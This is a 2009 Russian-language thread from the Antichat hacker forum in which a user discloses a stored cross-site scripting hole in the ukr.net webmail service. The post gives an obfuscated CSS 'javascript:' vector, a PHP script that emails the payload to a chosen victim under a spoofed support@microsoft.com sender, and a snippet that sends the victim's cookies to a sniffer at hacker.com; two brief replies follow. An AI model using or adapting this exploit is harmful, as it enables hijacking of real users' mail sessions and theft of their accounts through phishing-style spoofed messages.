Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Active XSS [ukr.net] (https://forum.antichat.xyz/showthread.php?t=120658)

Dimi4 14.05.2009 23:55

Active XSS [ukr.net]
 
Всем привет) На днях исследовал почту ukr.net'a :) Хотя нет, начну с того что мне жаль было постить это в паблике, так как проверено, быстро пофиксят.

Вообщем смотря сорцы одного из писем, я заметил что контент весь в :

Код:

<script>
        messageBody = '\nPew pew!';
        readmsgSetMessageBody();       
        </script>

Это уже выдвигало на некии мысли. Покопавшись еще чуть я остановился на таком вот векторе:

Код:

<font style="background:url\(javas/**/cript:eval(String.fromCharCode([evil encoded code])))">
Opera: [-]
IE: [+]
FF: [-]

Небольшой скриптик для отправки:
PHP код:

<?php
/**
 * (c) Dimi4, 2009
 * 
*/   
$target "petya@ukr.net";
$subj "Pew pew!";
$payload ="";
$evilcode="alert(1);"//img = new Image(); img.src = "http://hacker.com/sniffer/s.gif?"+document.cookie;
$strlenstrlen($evilcode);
        for(
$i=0$i !== $strlen$i++)
        {
            if(
$i+== $strlen$payload .= ord($evilcode[$i]);
            else 
$payload .= ord($evilcode[$i]).',';
        }
$header  "From: support@microsoft.com\r\n";
$header .= "MIME-Version: 1.0\r\n";
$header .= "Content-Type: text/html\r\n";
$msg ='<font style="background:url\(javas/**/cript:eval(String.fromCharCode('.$payload.')))">';
mail($target,$subj,$msg,$header);
?>

Собстна меняем $target на нужное мыло, и $evilcode на ченить хекерское, например имедж со снифером:
Код:

img = new Image(); img.src = "http://hacker.com/sniffer/s.gif?"+document.cookie;

.Slip 04.06.2009 00:29

from roa

Exlibris 04.06.2009 00:53

good блин хакер =(


Время: 12:59